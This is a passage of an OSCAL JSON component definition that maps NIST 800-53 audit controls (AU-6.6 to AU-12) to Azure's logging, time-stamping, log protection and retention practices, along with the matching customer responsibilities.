statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"43891404-71ec-4c36-96e1-f6c5e3975d4b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.6","statements":[{"uuid":"627f843b-8825-4a99-968a-03c726814a35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-025"},{"name":"control-origination","value":"system-specific"}],"statement-id":"au-6.6_smt","by-components":[{"uuid":"8105d58b-b84f-42e4-8c0e-eefe80b718b3","export":{"provided":[{"uuid":"ec1ac6d9-0903-48d2-8909-35dc4ac653e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-025"}],"description":"The Azure Security Response Team combines the analysis of 
audit records with physical security monitoring data as needed to aid in incident investigations. Any breaches or physical security incidents are reported through the incident reporting process by the physical security team if the physical security incident could potentially impact logical security. The Security Response Team then compares information from such physical security incidents to audit logging records to further identify and investigate suspicious behavior. Furthermore, when a physical incident is reported, the Security Response Team uses the related physical monitoring data and correlates it with audit records to determine if there was any associated logical breach or suspicious behavior in the Azure environment."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"79d1eec6-4e54-4ae3-b4cd-25e2279fecf5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.7","statements":[{"uuid":"0440924c-68f9-4072-a8ef-d2300f2017d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.7_smt","by-components":[{"uuid":"0de14f0b-5954-4417-9556-209f2ff9aa50","export":{"provided":[{"uuid":"3248059c-f0db-43ba-8b4f-6138478a5fa3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-026"}],"description":"Azure specifies the permitted actions for each process, role, or user via role-based access control. Security groups are defined in OneIdentity and MyAccess; each security group has specified access rights and permitted actions. 
Users are added to security groups via the account management process managed and implemented by Azure service teams.\n\nThe Azure Security Response Team, which is responsible for both incident management and monitoring, defines the roles and responsibilities in the Incident Management SOP, performs incident management, and monitors analytics from the logging systems. Only authorized members of the Security Response Team have access to audit log information; this information is used only to aid in incident management and investigation and is not available to personnel outside the incident management function."}],"responsibilities":[{"uuid":"5566fd92-8bf8-4c3c-a0fc-754910fa7955","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-026"}],"description":"The customer is responsible for specifying the permitted actions associated with the review, analysis, and reporting of customer-controlled audit information.","provided-uuid":"3248059c-f0db-43ba-8b4f-6138478a5fa3"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a06497d9-0d2c-45b2-8151-78a6937077e2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-7","statements":[{"uuid":"342840bb-038e-4887-b048-e6723b820c51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-7_smt.a","by-components":[{"uuid":"bded7a5b-036c-4409-b6c2-21f26763d08d","export":{"provided":[{"uuid":"a5ab1f0b-e2f8-4e85-9ef5-6676a499223a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-027"}],"description":"Azure service teams leverage Geneva Monitoring and SCUBA as part of environment-wide monitoring solutions. Geneva Monitoring and SCUBA digest large amounts of log data into human-readable alerting and reports. All events are logged and available for human review as needed, but all events are reviewed automatically and known good activity is filtered out from alerting on an ongoing basis. Events that meet detection criteria, such as those that could indicate attacks or misuse, are automatically flagged and escalated as alerts in S360 or work items in IcM or DevOps. 
These are sent directly to Azure service teams for clarification and feedback or escalated within the Security Response Team for incident management."}],"responsibilities":[{"uuid":"77cc8bf1-2a77-4570-9019-3a529d62f046","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-027"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing and implementing an audit reduction and report generation capability for customer-deployed resources, including the support of on-demand audit review, analysis, and reporting requirements, and after-the-fact investigations of security incidents.","provided-uuid":"a5ab1f0b-e2f8-4e85-9ef5-6676a499223a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fe195662-7851-448e-8ff4-ef05ee83644b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-7_smt.b","by-components":[{"uuid":"3f7c0772-cfe0-46ab-ac67-42d886b7cdda","export":{"provided":[{"uuid":"f7e52f89-8f84-4ca3-8972-c185111e80a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-028"}],"description":"The tools used in Azure to collect and process audit records do not permanently or irreversibly alter the original audit record content or time ordering. Kusto and Jarvis are not updateable data stores by default; they process logs as read-only. 
They do not provide any update or delete functionality."}],"responsibilities":[{"uuid":"45bdd777-5b67-4cc0-a702-b992ccc4f12c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-028"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for ensuring the original content and time ordering of customer-controlled audit records are not altered.","provided-uuid":"f7e52f89-8f84-4ca3-8972-c185111e80a3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"546a4309-0e8b-41b6-9d01-02e20ae7dd8b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-7.1","statements":[{"uuid":"76fd64e5-64da-49c8-a306-dca9af13302c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-7.1_smt","by-components":[{"uuid":"03b7a2e0-a52b-42c6-9450-198d024b633f","export":{"provided":[{"uuid":"f47de645-5af3-4cbe-b2cc-3293acd9c144","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-029"}],"description":"The incoming stream of events is aggregated, correlated, replicated via standard Azure Storage processes, and reduced to security- or service-relevant alerts that the service teams and the Security Response Team use to analyze and respond appropriately to suspicious activity. 
Authorized personnel are able to query Geneva Monitoring and generate reports that are used to review events or investigate specific activities."}],"responsibilities":[{"uuid":"5ec67c6b-4532-4c02-862a-bb01a2453a60","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-029"}],"description":"The customer is responsible for providing the capability to process customer-controlled audit records for events of interest.","provided-uuid":"f47de645-5af3-4cbe-b2cc-3293acd9c144"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5df7ff28-c484-4e04-bb1d-5fa6eb72adc8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-8","statements":[{"uuid":"6f12e54b-0c6c-41a5-a019-594a38b99032","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-8_smt.a","by-components":[{"uuid":"b946a330-15fd-40a0-9904-9da536b25323","export":{"provided":[{"uuid":"0ad8145a-05d5-40ad-852f-5ecfafaa14b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-030"}],"description":"For all Azure assets, the audit records generated capture the time stamp from the internal system clock of the asset that generated the event. Azure implements time stamps stored in UTC format using NTP Version 3, which is based on the time standard from the United States Naval Observatory. 
NTP is a protocol designed to synchronize the clocks of computers over a network to a common time base.\n\nAzure uses stratum 1 time sources in the United States for the infrastructure. Every pair of redundant core Azure datacenter routers (DCRs) provides clock information to the Azure datacenter devices. The overall approach is to use the DCRs as NTP servers. The DCRs synchronize to the authoritative stratum 1 time sources, with Azure equipment synchronizing to the DCRs.\n\nThe Azure NTP stratum 1 time servers synchronize to the Global Positioning System (GPS) satellites. The same IP addresses for NTP are configured on the DCRs in each Azure datacenter, with routing tables being used to determine the closest source to any given client via an anycast-style solution. These IP addresses are in management IP space and synchronization is done over the management network, which addresses ACL issues."}],"responsibilities":[{"uuid":"8673639c-26db-48d2-b1b5-92b0a1c3c480","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-030"}],"description":"The customer is responsible for generating time stamps for audit records of customer-deployed resources using the internal system clock.","provided-uuid":"0ad8145a-05d5-40ad-852f-5ecfafaa14b1"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a403baac-f9b2-4ff7-88b1-5b9b782f7bdb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-8_smt.b","by-components":[{"uuid":"3dd88366-763c-4a40-a48a-dd059ada418d","export":{"provided":[{"uuid":"3c0a24cb-bdf9-420b-ad97-e475183549f6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-031"}],"description":"Azure records time stamps for audit records that can be mapped to Coordinated Universal Time (UTC). Time stamps are generated either in UTC directly or in local time with an offset from UTC. Azure time stamps are precise at least to the millisecond."}],"responsibilities":[{"uuid":"1f3a5fd2-95db-4cfe-93ee-d2f3a2fbe512","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-031"}],"description":"The customer is responsible for ensuring customer-controlled audit records have time stamps that are recorded and can be mapped to Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT).","provided-uuid":"3c0a24cb-bdf9-420b-ad97-e475183549f6"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"28361f22-6d66-48e3-a6a3-b6116e1d0fff","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-9","statements":[{"uuid":"00f7d889-0519-4127-95b3-a1a2146551bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9_smt.a","by-components":[{"uuid":"8af81030-8461-435e-aa41-c019a7c19ea7","export":{"provided":[{"uuid":"4bfa880b-0f2d-4532-93b2-c50a313d6354","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-032"}],"description":"Only service team personnel for the specific asset within Azure have access to security logs on the local asset via the role-based access control (RBAC) implemented via OneIdentity. Azure implements protection of audit information using an authenticated and encrypted connection from the local asset of log generation to the centralized audit collection services using the Geneva Monitoring Agent (MA). Access to the centralized audit collection services and storage is restricted to the Security Engineering and Operations groups based on the standard access groups defined for Azure. Only authorized service team personnel are allowed access to the actual audit records, and their assigned rights prohibit them from modifying or deleting audit information. 
Even if a user is able to clear local asset log data after elevating permissions via an approved JIT request, the action of clearing the data is logged, and the cleared log data remains in Geneva Monitoring storage due to central ingestion. The following mechanisms are used to protect log information in transit and at rest:\n\n* Logs on the local asset can only be accessed through direct login to the asset.\n* The transfer of logs from the local asset to the service team and central storage accounts occurs over an HTTPS connection.\n* Read-only access to logs in Geneva Monitoring storage for Azure users is enabled through the Geneva Monitoring front-end portal. The access is restricted through AD security groups which are managed through OneIdentity."}],"responsibilities":[{"uuid":"2fa8cb0e-2d3a-40f4-a6bf-7e93f7a9c3d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-032"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for preventing unauthorized access to audit information and audit logging tools.","provided-uuid":"4bfa880b-0f2d-4532-93b2-c50a313d6354"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"96dad950-43c3-4d7c-a059-3f4a4d82443c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9_smt.b","by-components":[{"uuid":"5bd5dd06-b7b0-4a22-81b3-2389c84b59bd","export":{"provided":[{"uuid":"e507e236-2940-46b6-9be2-24a8ce543455","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-033"}],"description":"Azure 
configures the detections and resulting alerts to be sent to the appropriate parties for resolution. Depending on the alert, this can include the service team or the Security Response Team. For example, use of a Break-Glass account generates an alert to the service team owning the subscription in which the Break-Glass account access was utilized. Alternatively, alerts for malicious PowerShell scripts are routed to the Security Response Team. Regardless of which team the alert is routed to, all service teams, Azure personnel, and external customers can escalate an incident or report a new one."}],"responsibilities":[{"uuid":"bc17a375-7a4f-4b75-bfdd-eec2280b3921","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-033"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for alerting organization-defined personnel or roles upon detection of unauthorized access, modification, or deletion of audit information.","provided-uuid":"e507e236-2940-46b6-9be2-24a8ce543455"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"adea8b0b-03c4-4c05-a590-79625dc51421","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-9.2","statements":[{"uuid":"79def84d-0b91-4349-a1df-b71c06c51c25","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9.2_smt","by-components":[{"uuid":"f4dee4fc-2c08-4ff6-8e58-2bcc2c41cd36","export":{"provided":[{"uuid":"ce184938-402e-48c3-bcb0-b0faf1c0b4de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-034"}],"description":"Audit backs up logs to the service team Azure Storage accounts in near-real time. 
If this near-real-time log shipping fails, logs are retained on the local asset until they can be exported to the appropriate central storage location."}],"responsibilities":[{"uuid":"e28126c8-f44c-407f-a90e-96e258a5daf5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-034"}],"description":"The customer is responsible for backing up customer-controlled audit records to a physically different system at the required frequency.","provided-uuid":"ce184938-402e-48c3-bcb0-b0faf1c0b4de"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"08a7177c-3333-45ed-852a-5a6edf1db2b7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-9.3","statements":[{"uuid":"9247669a-9e3b-4120-b18c-fe44f26d0e12","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9.3_smt","by-components":[{"uuid":"fd8b43e4-931e-45e5-b1a5-9cf79f55452e","export":{"provided":[{"uuid":"1b74070c-2742-4176-8860-a689a3161924","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-035"}],"description":"Azure cryptographically protects all audit log data stored within the Azure Storage accounts used for audit log retention as a native feature of Azure Storage. 
In addition, Kusto and Jarvis storage is read-only by design, and once logs are ingested and stored, they cannot be altered or deleted in any way.\n\nAudit tooling is protected in the same manner as all other Azure code, via the code signing process as part of the Security Development Lifecycle (SDL) implementation and System Lockdown validation, currently operating in Audit Mode. System Lockdown alerts the affected Azure service team when unsigned code is installed and run within Azure. When Enforcement Mode is activated, System Lockdown will block unsigned code."}],"responsibilities":[{"uuid":"06cedf4c-aec0-44da-b041-1098ee7cfcc9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-035"}],"description":"The customer is responsible for maintaining the integrity of the customer-controlled audit system.","provided-uuid":"1b74070c-2742-4176-8860-a689a3161924"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f1c7dfd9-f25f-4461-bb5e-9eb16277c680","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-9.4","statements":[{"uuid":"f48c8c99-9857-4893-9301-3f012d1d7863","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-9.4_smt","by-components":[{"uuid":"6e1a4c95-5016-4fa2-9d2c-d06e3e1176d3","export":{"provided":[{"uuid":"4b803247-e1eb-4c20-91c4-d7083697596d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"ac
f-id","value":"AU-03-036"}],"description":"Azure restricts management of audit functionality within Azure to the service teams and Azure Security team with approved least privilege and separation of duties role-based access. If the audit logs contain customer information, the logs are further restricted to a defined access group managed by the service team and restricted to need-to-know personnel. These personnel do not have the ability to modify or delete audit records from the central log repositories, and if they disable logging, that action itself is logged and investigated."}],"responsibilities":[{"uuid":"fe1a444d-8870-4794-b9e8-2ffa9b5c9607","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-036"}],"description":"The customer is responsible for restricting the management of customer-controlled audit resources to authorized users.","provided-uuid":"4b803247-e1eb-4c20-91c4-d7083697596d"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1e309b6d-7e8e-4837-8cd2-5878ded3441e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-10","statements":[{"uuid":"69703b52-18d0-4220-b0bb-c29acf36be44","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-10_smt","by-components":[{"uuid":"feb39f8b-01c6-478d-8279-542b5c3b3fd6","export":{"provided":[{"uuid":"f1281563-430c-4977-b2f7-f7516ab0ec7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-037"}],"description":"As part of the content of audit records captured within Azure, unique identifiers are captured by servers, network devices, and services. Azure requires unique identifiers assigned based on an individual's unique account for Active Directory federation with domain and Authentication, Authorization, and Accounting (AAA) credentials. The combination of event logs capturing identifiers, and identifiers uniquely tied to an individual's Azure account, constitutes non-repudiation for the Azure environment.\n\nFor both Windows and Linux assets, the security logs are protected against tampering, and non-repudiation is supported, using the following configurations, with the implementation being platform specific:\n\n* On the asset, Geneva Monitoring Agent (MA) authenticates from the asset to the central service for uploading security logs. 
The security logs use the Geneva Control-Plane Service (GCS) to manage the authentication from the agent on the asset to the Geneva Monitoring service. GCS uses an Azure Storage Shared Access Signatures (SAS) key implementation so that the full key is not exposed to the users on the asset.\n* The Azure service IFx audit logs and key system application security events such as antimalware, PowerShell command line, and Terminal Services Remote Desktop Protocol access are uploaded every ten (10) minutes off the asset. The Linux system security event logs via AuditD and key system application security events such as antimalware are uploaded every one (1) minute off the asset. The MA watermarks the system security and IFx audit events to confirm that events are uploaded. The configuration has retry values in case the central store is offline so that the MA continues to retry uploads of the events when connectivity is re-established.\n* Once the logs are uploaded to the Geneva Monitoring storage accounts for each service, the logs are submitted to downstream detection systems within approximately fifteen (15) minutes to analyze specified security events for unusual activity. Analysis timelines vary depending on the type of detection. 
Additionally, the security logs are moved to cold storage every five (5) minutes as part of Geneva Monitoring.\n* Malicious activity on the asset that attempts to affect security log collection is monitored and alerted for, including monitoring for clearing of the security event log and audit policy changes."}],"responsibilities":[{"uuid":"c0b29032-cfb5-4bfb-8508-3837b8a907df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-037"}],"description":"The customer is responsible for enforcing non-repudiation for customer-deployed resources.","provided-uuid":"f1281563-430c-4977-b2f7-f7516ab0ec7b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"97cc67ec-c54c-4eeb-bb80-65d795527857","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-11","statements":[{"uuid":"f7b496ac-e1df-4238-873f-2fae6cf0a40c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-11_smt","by-components":[{"uuid":"90058f62-4560-403a-a507-96955b4a1b11","export":{"provided":[{"uuid":"4c6b2882-bf19-4e6f-bf7c-132f4bce8ee3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-038"}],"description":"Azure retains collected logs in storage for at least ninety (90) days to support investigations of security incidents and to meet regulatory retention requirements. 
Azure stores audit logs offline for at least one (1) year within Kusto storage.\n\nC+AI Security has developed an archiving infrastructure to securely store audit records on servers dedicated to archival purposes. The servers are designed to verify the integrity of archived files and allow authorized users to browse to an archive location. Audit records are stored in centralized log servers that are protected against alteration."}],"responsibilities":[{"uuid":"6c9dd693-7ff3-4a60-8295-d7a163b0a4f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-038"}],"description":"The customer is responsible for retaining audit records for customer-deployed resources to support security investigations and meet regulatory requirements. Audit records must be retained for the defined frequency.","provided-uuid":"4c6b2882-bf19-4e6f-bf7c-132f4bce8ee3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7c2cddc1-7094-4494-ace4-639506d6e8d8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-12","statements":[{"uuid":"e45b5bfc-f7e5-4af3-a226-a2302b41447b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12_smt.a","by-components":[{"uuid":"02e648bf-4385-4599-ad91-bfa7e0fd06b7","export":{"provided":[{"uuid":"10dc4403-8e00-457c-8407-ce25180e72e6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU
-03-039"}],"description":"Azure implements audit generation by configuring all servers, network devices, and services to have the capability to generate audit records and audit record metadata as required. Azure sets standard configuration baselines for all servers and network devices, ensuring the consistent generation of the required audit logs. Service teams ensure the required audit logs are captured at the service layer through the Azure Security Development Lifecycle (SDL) process. Azure also utilizes Azure Security Pack (AzSecPack) and Geneva Monitoring to ensure the central ingestion of those logs."}],"responsibilities":[{"uuid":"305c91a3-16f3-4bc8-a9fc-e690379f9d77","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-039"}],"description":"The customer is responsible for ensuring all customer-deployed resources have the ability to generate records for the auditable events defined in AU-02.a.","provided-uuid":"10dc4403-8e00-457c-8407-ce25180e72e6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0d9bc204-fbbc-4b56-a127-3bfdd067d19e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12_smt.b","by-components":[{"uuid":"55cf6e11-d96a-4b45-aa17-8252ad8e0854","export":{"provided":[{"uuid":"f0d5952e-264a-41ac-8258-3e596e4909b4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-040"}],"description":"Azure implements audit generation by configuring all system network devices and servers to have the capability to generate audit 
